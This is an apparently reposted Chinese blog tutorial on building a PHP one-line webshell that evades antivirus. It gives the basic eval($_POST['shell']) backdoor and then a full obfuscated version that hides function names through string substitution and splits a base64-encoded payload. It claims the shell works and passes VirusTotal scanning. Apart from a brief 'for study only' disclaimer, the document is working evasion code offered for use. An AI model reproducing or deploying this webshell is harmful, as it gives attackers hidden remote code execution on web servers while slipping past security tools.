PHP一句話木馬免殺

僅用于學習與交流，請勿用于非法用途！！！

簡介與思路

• 免殺技術全稱為反殺毒技術Anti Anti- Virus簡稱“免殺”，它指的是一種能使病毒木馬免于被殺毒軟件查殺的技術。

• 其思路基本上都是修改病毒、木馬的內容改變特征碼，從而躲避了殺毒軟件的查殺。說白了就是用各種各樣的方法（比如拼接，編碼，加密等）來隱藏關鍵代碼。

流程

• 先寫出基本語句

<?php eval($_POST['shell']); ?>

• 準備幾個函數來對基本語句進行偽裝

<?php eval($_POST['shell']); $huan = str_replace("ac","","sactacrac_raceacpaclacaacce"); // 思路是先在str_replace中寫好要構造的函數， // 這里是打算把$huan這個變量當成str_replace函數來用 // 就先把第一三個參數填好，第一個隨便填，第三個先填成要轉換的目標 // 得$huan = str_replace("ac","","str_replace") // 接著把第一個參數里面的東西隨便插入進去 // 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce") $jiemi = str_replace("bd","","bbdabdsbdebd64_dbdebdcbdobdde"); // 這里是打算把$jiemi這個變量當成base64_decode函數來用 $hanshu = str_replace("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn"); // 這里是打算把$hanshu這個變量當成create_function函數來用 ?>

• 把基本語句進行base64加密

$a="ZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOw=="; // 把基本語句進行base64加密

• 將加密后的語句拆分開

// 把基本語句進行base64加密,隨便插入點字符 $s1="ZXZhbqwerCgkX1"; $s2="BPUqwer1RbJ3"; $s3="NoqwerZWxsJ"; $s4="10qwerpOw==";

• 組裝

$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4))); // 利用之前準備好的函數和字符串把需要的語句拼出來,拼成一個匿名函數

• 調用

$ans(); // 調用這個函數

• 完整代碼

<?php $huan = str_replace("ac","","sactacrac_raceacpaclacaacce");//密碼是shell // 思路是先在str_replace中寫好要構造的函數， // 這里是打算把$huan這個變量當成str_replace函數來用 // 就先把第一三個參數填好，第一個隨便填，第三個先填成要轉換的目標 // 得$huan = str_replace("ac","","str_replace") // 接著把第一個參數里面的東西隨便插入進去 // 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce") $jiemi = $huan("bd","","bbdabdsbdebd64_dbdebdcbdobdde"); // 這里是打算把$jiemi這個變量當成base64_decode函數來用 $hanshu = $huan("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn"); // 這里是打算把$hanshu這個變量當成create_function函數來用 $s1="ZXZhbqwerCgkX1"; $s2="BPUqwer1RbJ3"; $s3="NoqwerZWxsJ"; $s4="10qwerpOw=="; // 將加密后的語句拆分開 $ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4))); // 利用之前準備好的函數和字符串把需要的語句拼出來,拼成一個匿名函數 $ans(); // 調用這個函數 ?>

可用性測試

?

可以發現這個馬是可以用的

云沙箱測試

VirusTotal

結果非常理想

總結

以上是生活随笔為你收集整理的PHP一句话木马免杀（通过VirusTotal测试）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。